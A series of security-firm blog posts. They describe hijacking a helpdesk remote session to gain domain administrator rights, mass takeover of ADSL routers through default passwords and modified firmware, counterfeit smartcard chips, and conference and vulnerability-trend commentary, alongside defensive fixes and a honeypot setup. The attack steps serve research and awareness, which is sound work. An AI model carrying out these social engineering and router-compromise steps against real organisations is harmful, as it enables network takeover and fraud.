INSIGHTS | April 10, 2013

What Would MacGyver Do?

“The great thing about a map: it gets you in and out of places in a lot different ways.” – MacGyver 

 

When I was young I was a big fan of the American TV show, MacGyver. Every week I tuned in to see how MacGyver would build some truly incredible things with very basic and unexpected materials — even if some of his solutions were hard to believe. For example, in one episode MacGyver built a futuristic motorized heat-seeking gun using only a set of batteries, an electric mixer, a rubber band, a serving cart, and half a suit of armor.

 
 

From that time I always kept the “What would MacGyver do?” spirit in my thinking. On the other hand I think I was “destined” to be an IT guy, and particularly in the security field, where we don’t have quite the same variety of materials to craft our solutions. 

 

But the “What would MacGyver do?” frame of mind helped me figure out a simple way to completely “own” a network environment in a MacGyver sort of way using just a small set of steps, including:

 
  • Exploiting a bad use of tools.
  • A small piece of social engineering.
  • Some creativity.
  • A small number of manual configuration changes..

I’ll relate how I lucked into this opportunity, how easy it can be to exploit certain circumstances, and especially how easy it would be to use a similar technique to gain domain administrator access for a company network.

 

The whole situation was due to the way helpdesk support was provided at the company I was working for. For security reasons non-administrative domain users were prevented from installing software on their desktops. So when I tried to install a small software application I received a very respectful “access denied” message. I felt a bit annoyed by this but still wanted my application, so I called the helpdesk and asked them to finish the installation remotely for me.

 

The helpdesk person was amenable, so I gave him my machine name and soon saw a pop-up window indicating that someone had connected to my machine and was interacting with my desktop.

 
 
 

My first impression was “Oh cool, this helpdesk is responsive and soon my software will be installed and I can finally start my project.”

 

But when I thought about this a bit more I started to wonder how the helpdesk person could install my software since he was trying to do so with my user privileges and desktop session rather than logging me out and connecting as an administrator.

 

And here we arrive at our first Act.

 

Act #1: Bad use of tools

 

Everything became clear when the helpdesk guy emulated a Ctrl+Alt+Delete combination that brings up the Windows menu and its awesome Switch User option. 

 
 
 

The helpdesk guy clicked the Switch User option and here I saw some magic — namely the support guy logging in right before my eyes with the local Administrator account.

 
 

Picture this: the support guy was typing in the password directly in front of my eyes. Even though I am an IT guy this was the first time I ever saw a support person interacting live with the Windows login screen. I wished I could see or intercept the password, but unfortunately I only saw ugly black dots in the password dialog box.

 

At that moment I felt frustrated, because I realized how close I was to having the local administrator password. But how could I get it?

 

The magic became clearer when the support guy logged in as an administrator on the machine and I was able to see him interacting with the desktop. That really made my day.

 
 
 
 
 

And then something even more magnificent happened while I was watching: for some undefined reason the support guy encountered a Windows session error. He had no choice but to log out, which he did, and then he logged in again with the Domain Administrator account … again right before my eyes!

 

(I don’t have a domain lab set up right now, so I can’t duplicate the screen image, but I am sure you can imagine the login window, which would look just like the one above except that it would include the domain name.)

 

When he logged in as the domain administrator I saw another nice desktop and the helpdesk guy interacting with my machine right in front of my eyes as the domain admin.

 

This is when I had a devious idea: I moved my mouse one millimeter and it moved while this guy was installing my software. At this point we arrive at the second Act.

 

Act #2: Some MacGyver magic

 

I asked myself, what if I did the following:

 

 

 

  • Unplug the network cable (I could have taken control of the mouse instead, but that would have aroused suspicion).
  • Stop the DameWare service that is providing access to the support guy.
  • Reconnect the network cable.
  • Create a new domain admin account (since the domain administrator is the operative account on my computer).
  • Restart the DameWare service.
  • Log out of the machine.

 

 

 

 

By completing these six steps that wouldn’t take more than two minutes I could have assumed domain administrator privileges for the entire company. 
Let’s recap the formula for this awesome sauce:

 

1. Bad use of tools: It was totally wrong for the help desk person to open a domain admin session directly under the user’s eyes and giving him the opportunity to take control of the session. 

2. A small piece of social engineering: Just call the support desk and ask them to install some software for you. 

3. A small amount of finagling on your part: Use the following steps when the help desk person logs in to push him to log in as Domain Admin:

       Unplug the network cable (1 second).
     •      Change the local administrator password (7 seconds).
     •       Log out (2 seconds).
     •      Plug the network cable back in (1 second).

4. Another small piece of social engineering: Call the support person back and blame Microsoft Windows for a crash. Cross your fingers that after he is unable  to login as local admin (because you changed the password) he will instead login as a domain administrator.

5. Some more finagling on your part: Do the same steps defined in step 3 to create a new domain admin account.

6. Success: Enjoy being a domain administrator for the company.


Final Act: Conclusion


At the beginning of my IT security career I was a bit skeptical of the magic of social engineering. But through the years I have learned that social engineering still works and will always work. Even if the social engineering involves the tiniest and most basic request, if you combine social engineering with some imagination you can own a huge company. And if you are conducting a pentest you don’t always have to rely exclusively on your technical expertise in pentesting. You can draw on your imagination and creativity to build a powerful weapon using small and basic tools …. just like MacGyver.
INSIGHTS | April 2, 2013

Spotting Fake Chips in the Supply Chain

In the information security world we tend to focus upon vulnerabilities that affect the application and network architecture layers of the enterprise and, every so often, some notable physical devices. Through various interrogatory methods we can typically uncover any vulnerabilities that may be present and, through discussion with the affected business units, derive a relative statement of risk to the business as a whole.

 

An area of business rarely dissected from an information security perspective however is the supply chain. For manufacturing companies and industrial suppliers, nothing is more critical to their continued business success than maintaining the integrity and reliability of their supply chain. For some industries – such as computer assembly or truck fabrication facilities – even the smallest hiccup in their just-in-time ordering system can result in entire assembly lines being gummed up and product not being rolled out the front door.

 

The traditional approach to identifying vulnerabilities within the supply chain is largely through a paper-based audit process – sometimes top-and-tailed with a security assessment of PC-based assessments. Rarely (if ever) are the manufacturing machines and associated industrial control systems included in physical assessments or penetration tests for fear of disrupting the just-in-time manufacturing line.

 

Outside the scope of information security assessment, and often beyond the capabilities of automated quality assurance practices within an organizations assembly line, lies the frailty of being victim to failure of a third-party supplier’s tainted supply chain.

 

For example, let’s look at a common microprocessor ordered through a tainted supply chain.

 

Dissecting a ST19XT34 Microprocessor

 

In early 2012 samples of the ST ST19XT34 were ordered from https://us.hkinventory.com/.  The ST19XT34 is a secure microprocessor designed for very large volume and cost-effective secure portable applications (such as smartcards used within Chip&PIN technologies). The ST19X platform includes an internal Modular Arithmetic Processor (MAP) and DES accelerator – designed to speed up cryptographic calculations using Public Key Algorithms and Secret Key Algorithms.

 

The ST19XT34 chips that IOActive were charged to investigate were encapsulated within a standard SOIC package and were supposed to have 34kb of EEPROM.

 

Upon visual analysis the devices appeared to be correct.  However, after decapsulation, it was clear that the parts provided were not what had been ordered.

 
 
 

In the above image we have a ‘fake’ ST19XT34 on the left with a sample of the genuine chip on the right.  It is almost impossible to tell the left device was altered unless you have a known original part.

 
 
 

After decapsulation of the various parts it was easy to immediately recognize the difference between the two SOIC part.  The left ‘fake’ device was actually an ST ST19AF08 with the right being the genuine ST19XT34.

 
 

The ST19AF08 is a 600 nanometer 3 metal device (on left).  It contains an 8 KB EEPROM.

 

The ST19XT34 is a 350 nanometer 3 metal device (on right).  It contains a 34 KB EEPROM making the die much larger than the older and smaller sized device.

 

Microprocessor Supply Chain Frailty

 

As the example above clearly shows, it is often very difficult to identify a tainted supply chain. While an x-ray in the above case could also have verified the integrity of the supplier if it had been part of the quality assurance process, it would not have detected more subtle modifications to the supplied microprocessors.

 

If it is so easy to taint the supply chain and introduce fraudulently marked microprocessors, how hard is it to insert less obvious – more insidious – changes to the chips? For example, what if a batch of ST19XT34 chips had been modified to weaken the DES/triple-DES capabilities of the chip, or perhaps the random number generator was rigged with a more predictable pseudo random algorithm – such that an organized crime unit or government entity could trivially decode communications or replay transactions?

 

The frailty of today’s supply chain is a genuine concern for many. The capability of organized crime and foreign government entities to include backdoors, add malicious code, or subvert “secure” routines within fake or counterfeit microprocessors is not a science fiction story, but something that can occur today. The ability to inject these modified chips in to the supply chain of any global manufacturer of goods is, quite frankly, trivial.

 

The cost of entry for organized criminals and government entities to undertake this kind of manipulation of the supply chain is high, but well within their financial capabilities – and, more importantly, they could reap great rewards from their investment. 

 

Identifying a tainted supply chain is not a simple task. It requires specialized equipment capable of dissecting microprocessors at the nanometer scale, fiddly extraction of microcode, and skilled security analysts to sift through the code looking for backdoors and deliberate weaknesses in the algorithms. 

 

It’s an expensive and time consuming proposition – but fast becoming  a critical component when it comes to assuring that today’s smartphones, Chip&PIN technologies and critical infrastructure control systems aren’t subject to organized subversion.

INSIGHTS | March 28, 2013

Behind ADSL Lines: How to Bankrupt ISPs While Making Money

Disclaimer: No businesses or even the Internet were harmed while researching this post. We will explore how an attacker can control the Internet access of one or more ISPs or countries through ordinary routers and Internet modems.

Cyber-attacks are hardly new in 2013. But what if an attack is both incredibly easy to construct and yet persistent enough to shut Internet services down for a few hours or even days? In this blog post we will talk about how easy it would be to enlist ordinary home Internet connections in this kind of attack, and then we suggest some potentially straightforward solutions to this problem.
The first problem
The Internet in the last 10 to 20 years has become the most pervasive way to communicate and share news on the planet. Today even people who are not at all technical and who do not love technology still use their computers and Internet-connected devices to share pictures, news, and almost everything else imaginable with friends and acquaintances.
All of these computers and devices are connected via CPEs (customer premises equipment) such as routers, modems, and set-top boxes etc. that enable consumers to connect to the Internet. Although most people consider these CPEs to be little magic boxes that do not need any sort of provisioning, in fact these plug-and-play devices are a key, yet weak link behind many major attacks occurring across the web today.
These little magic boxes come with some nifty default features:
  • Updateable firmware.
  • Default passwords.
  • Port forwarding.
  • Accessibility over http or telnet.
 
The second problem
All ISPs across the world share a common flaw. Look at the following screen shot and think about how one might leverage this flaw.
Most ISPs that own one or more netblocks typically write meaningful descriptions that provide some insight into what they are used for.
Attack phase 1
So what could an attacker do with this data?
  1. They can gather a lot of information about netblocks for one or more ISPs and even countries and some information about their use from http://bgp.he.net and http://ipinfodb.com.
  2. Next, they can use whois or parse bgp.he.net to search for additional information about these netblocks, such as data about ADSL, DSL, Wi-Fi, Internet users, and so on.
  3. Finally, the attacker can convert the matched netblocks into IP addresses.
At this point the attacker could have:
  • Identified netblocks for an entire ISP or country.
  • Pinpointed a lot of ADSL networks, so they have minimized the effort required to scan the entire Internet. With a database gathered and sorted by ISP and country an attacker can, if they wanted to, control a specific ISP or country.
Next the attacker can test how many CPEs he can identify in a short space of time to see whether this attack would be worth pursuing:
A few hours later the results are in:

 

 

 

 

 

In this case the attacker has identified more than 400,000 CPEs that are potentially vulnerable to the simplest of attacks, which is to scan the CPEs using both telnet and http for their default passwords.
We can illustrate the attacker’s plan with a simple diagram:

 

Attack Phase 2 (Command Persistence) 
Widely available tools such as binwalk, firmware-mod-kit, and unix dd make it possible to modify firmware and gain persistent control over CPEs. And obtaining firmware for routers is relatively easy. There are several options:
  1. The router is supported by dd-wrt (http://dd-wrt.com)
  2. The attacker either works at an ISP or has a friend who works at an ISP and happens to have easy access to assorted firmware.
  3. Search engines and dorks.
As soon as the attacker is comfortable with his reverse-engineered and modified firmware he can categorize them by CPE model and match them to the realm received from the CPE under attack. In fact with a bit of tinkering an attacker can automate this process completely, including the ability to upload the new firmware to the CPEs he has targeted. Once installed, even a factory reset will not remove his control over that CPE.
The firmware modifications that would be of value to attacker include but are not limited to the following:
  • Hardcoded DNS servers.
  • New IP table rules that work well on dd-wrt-supported CPEs.
  • Remove the Upload New Firmware page.
CPE attack phase recap
  1. An attacker gathers a country’s netblocks.
  2. He filters ADSL networks.
  3. He reverse engineers and modifies firmware.
  4. He scans ranges and uploads the modified firmware to targeted CPEs.
Follow-up attack scenarios
If an attacker is able to successfully compromise a large number of CPEs with the relatively simple attack described above, what can he do for a follow-up?
  • ISP attack: Let’s say an ISP has a large number of IP addresses vulnerable to the CPE compromise attack and an attacker modifies the firmware settings on all the ADSL routers on one or more of the ISP’s netblocks. Most ISP customers are not technical, so when their router is unable to connect to the Internet the first thing they will do is contact the ISP’s Call Center. Will the Call Center be able to handle the sudden spike in the number of calls? How many customers will be left on hold? And what if this happens every day for a week, two weeks or even a month? And if the firmware on these CPEs is unfixable through the Help Desk, they may have to replace all of the damaged CPEs, which becomes an extremely costly affair for the company.
  • Controlling traffic: If an attacker controls a huge number of CPEs and their DNS settings, being able to manipulate website traffic rankings will be quite trivial. The attacker can also redirect traffic that was supposed to go to a certain site or search engine to another site or search engine or anywhere else that comes to mind. (And as suggested before, the attacker can shut down the Internet for all of these users for a very long time.)
  • Company reputations: An attacker can post:
    • False news on cloned websites.
    • A fake marketing campaign on an organization’s website.
  • Make money: An attacker can redirect all traffic from the compromised CPEs to his ads and make money from the resulting impressions. An attacker can also add auto-clickers to his attack to further enhance his revenue potential.
  • Exposing machines behind NAT: An attacker can take it a step further by using port forwarding to expose all PCs behind a router, which would further increase the attack’s potential impact from CPEs to the computers connected to those CPEs.
  • Launch DDoS attacks: Since the attacker can control traffic from thousands of CPEs to the Internet he can direct large amounts of traffic at a desired victim as part of a DDoS attack.
  • Attack ISP service management engines, Radius, and LDAP: Every time a CPE is restarted a new session is requested; if an attacker can harvest enough of an ISP’s CPEs he can cause Radius, LDAP and other ISP services to fail.
  • Disconnect a country from the Internet: If a country’s ISPs do not protect against the kind of attack we have described an entire country could be disconnected from the Internet until the problem is resolved.
  • Stealing credentials: This is nothing new. If DNS records are totally in the control of an attacker, they can clone a few key social networking or banking sites and from there they could steal all the credentials he or she wants.
In the end it would be almost impossible to take back control of all the CPEs that were compromised through the attack strategies described above. The only way an ISP could recover from this kind of incident would be to make all their subscribers buy new modems or routers, or alternatively provide them with new ones.
Solutions
There are two solutions to this problem. This involves fixes from CPE vendors and also from the ISPs.
Vendor solution: 
Vendors should stop releasing CPEs that have only rudimentary and superficial default passwords. When a router is being installed on a user’s premises the user should be required to change the administrator password to a random value before the CPE becomes fully functional.
ISP solutions: 
Let’s look at a normal flow of how a user receives his IP address from an ISP:
  1. The subscriber turns on his home router or modem, which sends an authentication request to the ISP.
  2. ISP network devices handle the request and forwards it to Radius to check the authentication data.
  3. The Radius Server sends Access-Accept or Access-Reject messages back to the network device.
  4. If the Access-Accept message is valid, DHCP assigns an IP to the subscriber and the subscriber is now able to access the Internet.
However, this is how we think this process should change:
  1. Before the subscriber receives an IP from DHCP the ISP should check the settings on the CPE.
  2. If the router or modem is using the default settings, the ISP should continue to block the subscriber from accessing the Internet. Instead of allowing access, the ISP should redirect the subscriber to a web page with a message “You May Be At Risk: Consult your manual and update your device or call our help desk to assist you.
  3. Another way of doing this on the ISP side is to deny access from the Broadband Remote Access Server (BRAS) routers that are at the customer’s edge; an ACL could deny some incoming ports, but not limited to 80,443,23,21,8000,8080, and so on.
  4. ISPs on international gateways should deny access to the above ports from the Internet to their ADSL ranges.
Detecting attacks
ISPs should be detecting these types of attacks. Rather than placing sensors all over the ISP’s network, the simplest way to detect attacks and grab evidence is to lure such attackers into a honeypot. Sensors would be a waste of money and require too much administrative overhead, so let’s focus on one server:
        1- Take a few unused ADSL subnets /24
x.x.x.0/24
x.x.y.0/24 and so on
 
2- Configure the server to be a sensor:
A simple telnet server and a simple Apache server with htpasswd setup as admin admin on the web server’s root directory would suffice.
3- On the router that sits before the servers configure static routes with settings that look something like this:
route x.x.x.0/24 next-hop <server-ip>;
route x.x.y.0/24 next-hop <server-ip>;
route x.x.z.0/24 next-hop <server-ip>;
4- After that you should redistribute your static routes to advertise them on BGP so when anyone scans or connects to any IP in the above subnets they will be redirected to your server.
 
5- On the server side (it should probably be a linux server) the following could be applied (in the iptables rules):
iptables -t nat -A PREROUTING -p tcp -d x.x.x.0/24 –dport 23 -j DNAT –to <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.y.0/24 –dport 23 -j DNAT –to <server-ip>:24
iptables -t nat -A PREROUTING -p tcp -d x.x.z.0/24 –dport 23 -j DNAT –to <server-ip>:24
 
  6- Configure the server’s honeypot to listen on port 24; the logs can be set to track the x.x.(x|y|z).0/24 subnets instead of the server.
Conclusion
The Internet is about traffic from a source to a destination and most of it is generated by users. If users cannot reach their destination then the Internet is useless. ISPs should make sure that end users are secure and users should demand  ISPs to implement rules to keep them secure. At the same time, vendors should come up with a way to securely provision their CPEs before they are connected to the Internet by forcing owners to create non-dictionary/random usernames or passwords for these devices.
INSIGHTS | March 14, 2013

Credit Bureau Data Breaches

This week saw some considerable surprise over how easy it is to acquire personal credit report information.  On Tuesday Bloomberg News led with a story of how “Top Credit Agencies Say Hackers Stole Celebrity Reports”, and yesterday there were many follow-up stories examining the hack. In one story I spoke with Rob Westervelt over at CRN regarding the problems credit reporting agencies face when authenticating the person for which the credit information applies and the additional problems they face securing the data in general (you can read the article “Equifax, Other Credit Bureaus Acknowledge Data Breach”).

 

Many stories have focused on one of two areas – the celebrities, or the ease of acquiring credit reports – but I wanted to touch upon some of the problems credit monitoring agencies face in verifying who has access to the data and how that fits in to the bigger problem of Internet-based authentication and the prevalence of personal-enough information.
The repeated failure of Internet portals tasked with providing access to personal credit report information stems from the data they have available that can be used for authentication, and the legislated requirement to make the data available in the first place.
Credit monitoring agencies are required to make the data accessible to all the individuals they hold reports on, however access to the credit report information is achieved through a wide variety of free and subscription portals – most of which are not associated with the credit monitoring bureaus in the first place.
In order to provide access to a particular individual’s credit report, the user must answer a few questions about themselves via one such portal. These questions, by necessity, are restricted to the kinds of data held (and tracked) by the credit reporting agencies – based off information garnered from other financial institutions. This information includes name, date of birth (or age), social security number, account numbers, account balances, account addresses, financial institutes that manages the accounts, and past requests for access to credit report information. While it sounds like a lot of information, it’s actually not a very rich source for authentication purposes – especially when some of the most important information that can uniquely identify the individual is relatively easy to acquire through other external and Internet-based sources.
Time Magazine’s article “Hackers Now Aiming For Your Credit Reports” of a year ago describes many of these limitations and where some of this information can be acquired. In essence though, the data is easy to mine from social media sites and household tax records; and a little bruteforce guessing can overcome the hurdle of it not already being in the public domain.
The question then becomes “what can the credit monitoring agencies do to protect the privacy of credit reports?”  Some commentators have recommended that individuals should provide a copy of state-issued identification documents – such as a drivers license or passport.
The submission of such a scanned document poses new problems for the credit monitoring agencies. First of all, this probably isn’t automatable on a large scale and they’ll need trained staff to review each of these documents. Secondly, there are plenty of tools and websites that allow you to generate a fake ID within seconds – and spotting the fakes will be extremely difficult without tying the authentication process to an external government authentication system (e.g. checking to see if the drivers license or passport number is legitimate). Thirdly, do you want the credit reporting agencies holding even more personal information about you?
This entire problem is getting worse – not just for the credit monitoring agencies, but for all online services. Authentication – especially “first time” authentication – is difficult at the best of times, but if you’re trying to do this using only data an organization has collected and holds themselves, it’s neigh on impossible given current hacking techniques.
I hate to say it, but there’s a very strong (and growing) requirement for governments to play a larger role in identity management. Someone somewhere needs to act as a trusted Internet passport authority – with “trusted” being the critical piece. I’ve seen the arguments that have been made for Facebook, Google, etc. being that identity management platform, but I respectively disagree. These commercial services aren’t identity management platforms, they’re authentication gateways. What is needed is the cyber-equivalent of a government-issued passport, with all the checks and balances that entails.
Even that is not perfect, but it would certainly be better than the crumby vendor-specific authentication systems and password recovery processes that currently plague the Internet.
In the meantime, don’t be surprised if you find your credit report and other personal information splattered over the Internet as part of some juvenile doxing attack.
— Gunter Ollmann, CTO IOActive Inc.
INSIGHTS | February 25, 2013

IOAsis at RSA 2013

RSA has grown significantly in the 10 years I’ve been attending, and this year’s edition looks to be another great event. With many great talks and networking events, tradeshows can be a whirlwind of quick hellos, forgotten names, and aching feet. For years I would return home from RSA feeling as if I hadn’t sat down in a week and lamenting all the conversations I started but never had the chance to finish. So a few years ago during my annual pre-RSA Vitamin D-boosting trip to a warm beach an idea came to me: Just as the beach served as my oasis before RSA, wouldn’t it be great to give our VIPs an oasis to escape to during RSA? And thus the first IOAsis was born.


Aside from feeding people and offering much needed massages, the IOAsis is designed to give you a trusted environment to relax and have meaningful conversations with all the wonderful folks that RSA, and the surrounding events such as BSidesSF, CSA, and AGC, attract. To help get the conversations going each year we host a number of sessions where you can join IOActive’s experts, customers, and friends to discuss some of the industry’s hottest topics. We want these to be as interactive as possible, so the following is a brief look inside some of the sessions the IOActive team will be leading.

 

(You can check out the full IOAsis schedule of events at:

Chris Valasek @nudehaberdasher

 

Hi everyone, Chris Valasek here. I just wanted to let everyone know that I will be participating in a panel in the RSA 2013 Hackers & Threats track (Session Code: HT-R31) on Feb 28 at 8:00 a.m. The other panelists and I will be giving our thoughts on the current state of attacks, malware, governance, and protections, which will hopefully give attendees insight into how we as security professionals perceive the modern threat landscape. I think it will be fun because of our varied perspectives on security and the numerous security breaches that occurred in 2012.

Second, Stephan Chenette and I will talking about assessing modern attacks against PCs at IOAsis on Wednesday at 1:00-1:45. We believe that security is too often described in binary terms — “Either you ARE secure or you are NOT secure — when computer security is not an either/or proposition. We will examine current mainstream attack techniques, how we plan non-binary security assessments, and finally why we think changes in methodologies are needed. I’d love people to attend either presentation and chat with me afterwards. See everyone at RSA 2013!

 

By Gunter Ollman @gollmann

 

My RSA talk (Wednesday at 11:20), “Building a Better APT Package,” will cover some of the darker secrets involved in the types of weaponized malware that we see in more advanced persistent threats. In particular I’ll discuss the way payloads are configured and tested to bypass the layers of defensive strata used by security-savvy victims. While most “advanced” features of APT packages are not very different from those produced by commodity malware vendors, there are nuances to the remote control features and levels of abstraction in more advanced malware that are designed to make complete attribution more difficult.

Over in the IOAsis refuge on Wednesday at 4:00 I will be leading a session with my good friend Bob Burls on “Fatal Mistakes in Incident Response.” Bob recently retired from the London Metropolitan Police Cybercrime Division, where he led investigations of many important cybercrimes and helped put the perpetrators behind bars. In this session Bob will discuss several complexities of modern cybercrime investigations and provide tips, gotcha’s, and lessons learned from his work alongside corporate incident response teams. By better understanding how law enforcement works, corporate security teams can be more successful in engaging with them and receive the attention and support they believe they need.

By Stephan Chenette @StephanChenette

 

At IOAsis this year Chris Valasek and I will be presenting on a topic that builds on my Offensive Defense talk and starts a discussion about what we can do about it.

For too long both Chris and I have witnessed the “old school security mentality” that revolves solely around chasing vulnerabilities and remediation of vulnerable machines to determine risk.  In many cases the key motivation is regulatory compliance. But this sort of mind-set doesn’t work when you are trying to stop a persistent attacker.

What happens after the user clicks a link or a zero-day attack exploits a vulnerability to gain entry into your network? Is that part of the risk assessment you have planned for? Have you only considered defending the gates of your network? You need to think about the entire attack vector: Reconnaissance, weaponization, delivery, exploitation, installation of malware, and command and control of the infected asset are all strategies that need further consideration by security professionals. Have you given sufficient thought to the motives and objectives of the attackers and the techniques they are using? Remember, even if an attacker is able to get into your network as long as they aren’t able to destroy or remove critical data, the overall damage is limited.

Chris and I are working on an R&D project that we hope will shake up how the industry thinks about offensive security by enabling us to automatically create non-invasive scenarios to test your holistic security architecture and the controls within them. Do you want those controls to be tested for the first time in a real-attack scenario, or would you rather be able to perform simulations of various realistic attacker scenarios, replayed in an automated way producing actionable and prioritized items?

Our research and deep understanding of hacker techniques enables us to catalog various attack scenarios and replay them against your network, testing your security infrastructure and controls to determine how susceptible you are today’s attacks. Join us on Wednesday at 1:00 to discuss this project and help shape its future.

 

By Tiago Asumpcao @coconuthaxor

 

 

At RSA I will participate in a panel reviewing the history of mobile security. It will be an opportunity to discuss the paths taken by the market as a whole, and an opportunity to debate the failures and victories of individual vendors.

 

Exploit mitigations, application stores and mobile malware, the wave of jail-breaking and MDM—hear the latest from the folks who spend their days and nights wrestling with modern smartphone platforms.While all members of the panel share a general experience within the mobile world, every individual brings a unique relationship with at least one major mobile industry player, giving the Mobile Security Battle Royale a touch of spice.

At IOAsis on Tuesday at 2:00 I will present the problem of malware in application stores and the privacy in mobile phones. I will talk about why it is difficult to automate malware analysis in an efficient way, and what can and cannot be done. From a privacy perspective, how can the user keep both their personal data and the enterprise’s assets separate from each other and secure within such a dynamic universe? To the enterprise, which is the biggest threat: malicious apps, remote attacks, or lost devices?
I will raise a lot of technical and strategic questions. I may not be able to answer them all, but it should make for lively and thought-provoking discussion.

 

By Chris Tarnovsky @semiconduktor
I will be discussing the inherent risks of reduced instruction set computer (RISC) processors vs. complex instruction set computer (CISC) processors at IOAsis on Tuesday at 12:00.

 

Many of today’s smart cards favor RISC architectures, ARM, AVR, and CalmRisc16 being the most popular versions seen in smartcards. Although these processors provide high performance, they pose a trade-off from a security perspective.

 

The vendors of these devices offer security in the form of sensors, active meshing, and encrypted (scrambled) memory contents. From a low-level perspective these all offer an attacker an easy way to block branch operations and make it possible to address the device’s entire memory map.

 

To prevent branches on an AVR and CalmRisc16 an attacker only needs to cut and strap the highest bit to a ‘0’. After doing so the branch instruction is impossible to execute. An instruction that should have been a branch will become something else without the branch effect, allowing an attacker to sit on the bus using only one to two micro-probing needles.

 

On the other hand, CPU architectures such as 8051 or 6805 are not susceptible to such attacks. In these cases modifying a bus is much more complicated and would require a full bus width of edits.

 

I look forward to meeting everyone!
INSIGHTS | February 4, 2013

2012 Vulnerability Disclosure Retrospective

Vulnerabilities, the bugbear of system administrators and security analysts alike, keep on piling up – ruining Friday nights and weekends around the world as those tasked with fixing them work against ever shortening patch deadlines.

In recent years the burden of patching vulnerable software may have felt to be lessening; and it was, if you were to go by the annual number of vulnerabilities publicly disclosed. However, if you thought 2012 was a little more intense than the previous half-decade, you’ll probably not be surprised to learn that last year bucked the downward trend and saw a rather big jump – 26% over 2011 – all according to the latest analyst brief from NSS Labs, “Vulnerability Threat Trends: A Decade in Review, Transition on the Way”.

Rather than summarize the fascinating brief from NSS Labs with a list of recycled bullet points, I’d encourage you to read it yourself and to view the fascinating video they constructed that depicts the rate and diversity of vulnerability disclosures throughout 2012 (see the video – “The Evolution of 2012 Vulnerability Disclosures by Vendor”).

I was particularly interested in the Industrial Control System (ICS/SCADA) vulnerability growth – a six-fold increase since 2010! Granted, of the 5225 vulnerabilities publicly disclosed and tracked in 2012 only 124 were ICS/SCADA related (2.4 percent), it’s still noteworthy – especially since I doubt very few of vulnerabilities in this field are ever disclosed publicly.

Once you’ve read the NSS Labs brief and digested the statistics, let me tell you why the numbers don’t really matter and why the ranking of vulnerable vendors is a bit like ranking car manufacturers by the number of red cars they sold last year.

A decade ago, as security software and appliance vendors battled for customer dollars, vulnerability numbers mattered. It was a yardstick of how well one security product (and vendor) was performing against another – a kind of “my IDS detects 87% of high risk vulnerabilities” discussion. When the number of vulnerability disclosures kept on increasing and the cost of researching and developing detection signatures kept going up, yet the price customers were willing to pay in maintenance fees for their precious protection technologies was going down, much of the discussion then moved to ranking and scoring vulnerabilities… and the Common Vulnerability Scoring System (CVSS) was devised.

CVSS changed the nature of the game. It became less about covering a specific percentage of vulnerabilities and more about covering the most critical and exploitable. The ‘High, Medium, and Low’ of old, got augmented with a formal scoring system and a bevy of new labels such as ‘Critical’ and ‘Highly Critical’ (which, incidentally, makes my teeth hurt as I grind them at the absurdity of that term). Rather than simply shuffling everything to the right, with the decade old ‘Medium’ becoming the new ‘Low’, and the old ‘Low’ becoming a shrug and a sensible “if you can be bothered!”… we ended up with ‘High’ being “important, fix immediately”, then ‘Critical’ assuming the role of “seriously, you need to fix this one first!”, and ‘Highly Critical’ basically meaning “Doh! The Mayans were right, the world really is going to end!”

But I digress. The crux of the matter as to why annual vulnerability statistics don’t matter and will continue to matter less in a practical sense as times goes by is because they only reflect ‘Disclosures’. In essence, for a vulnerability to be counted (and attribution applied) it must be publicly disclosed, and more people are finding it advantageous to not do that.

Vulnerability markets and bug purchase programs – white, gray and black – have changed the incentive to disclose publicly, as well as limit the level of information that is made available at the time of disclosure. Furthermore, the growing professionalization of bug hunting has meant that vulnerability discoveries are valuable commercial commodities – opening doors to new consulting engagements and potential employment with the vulnerable vendor. Plus there’s a bunch of other lesser reasons why public disclosures (as a percentage of actual vulnerabilities found by bug hunters and reported to vendors) will go down.

The biggest reason why the vulnerability disclosures numbers matter less and less to an organization (and those charged with protecting it), is because the software landscape has fundamentally changed. The CVSS approach was primarily designed for software that was brought, installed and operated by multiple organizations – i.e. software packages that could be patched by their many owners.

With today’s ubiquitous cloud-based services – you don’t own the software and you don’t have any capability (or right) to patch the software. Whether it’s Twitter, Salesforce.com, Dropbox, Google Docs, or LinkedIn, etc. your data and intellectual property is in the custodial care of a third-party who doesn’t need to publicly disclose the nature (full or otherwise) of vulnerabilities lying within their backend systems – in fact most would argue that it’s in their best interest to not make any kind of disclosure (ever!).

Why would someone assign a CVE number to the vulnerability? Who’s going to have all the disclosure details to construct a CVSS score, and what would it matter if they did? Why would the service provider issue an advisory? As a bug hunter who responsibly discloses the vulnerability to the cloud service provider you’d be lucky to even get any public recognition for your valuable help.

With all that said and done, what should we take-away from the marvelous briefing that NSS Labs has pulled together? In essence, there’s a lot of vulnerabilities being disclosed and the vendors of the software we deploy on our laptops and servers still have a ways to go to improving their security development lifecycle (SDL) – some more than others.

While it would be nice to take some solace in the ranking of vulnerable vendors, I’d be more worried about the cloud vendors and their online services and the fact that they’re not showing up in these annual statistics – after all, that’s were more and more of our critical data is being stored and manipulated.

— Gunter Ollmann, CTO — IOActive, Inc.

INSIGHTS | January 25, 2013

S4x13 Conference

S4 is my favorite conference. This is mainly because it concentrates on industrial control systems security, which I am passionate about. I also enjoy the fact that the presentations cover mostly advanced topics and spend very little time covering novice topics.

Over the past four years, S4 has become more of a bits and bytes conference with presentations that explain, for example, how to upload Trojan firmwares to industrial controllers and exposés that cover vulnerabilities (in the “insecure by design” and “ICS-CERT” sense of the word).

This year’s conference was packed with top talent from the ICS and SCADA worlds and offered a huge amount of technical information. I tended to follow the “red team” track, as these talks broke varying levels of control systems networks.

Sergey Gordeychick gave a great talk on the vulnerabilities in various ICS software applications, including the release of an “1825-day exploit” for WinCC, which Siemens did not patch for five years. (The vulnerability finally closed in December 2012.)
 

Alexander Timorin and Dmitry Skylarov released a new tool for reversing S7 passwords from a packet capture. A common feature of many industrial controllers includes homebrew hashing algorithms and authentication mechanisms that simply fall apart under a few days of scrutiny. Their tool is being incorporated into John the Ripper. A trend in the ICS space seems to include the incorporation of ICS-specific attacks into current attack frameworks. This makes ICS hacking far more available to network security assessors, as well as to the “Bad Guys”. My guess is that this trend will continue in 2013.
Billy Rios and Terry McCorkle talked about medical controllers and showed a Phillips XPER controller that they had purchased on eBay. The computer itself had not been wiped and contained hard-coded accounts as well as trivial buffer overflow vulnerabilities running on Windows XP.
Arthur Gervais released a slew of Schneider Modicon PLC-related vulnerabilities. Schneider’s service for updating Unity (the engineering software for Modicon PLCs) and other utilities used HTTP to download software updates, for example. I was sad that I missed his talk due to a conflict in the speaking schedule.
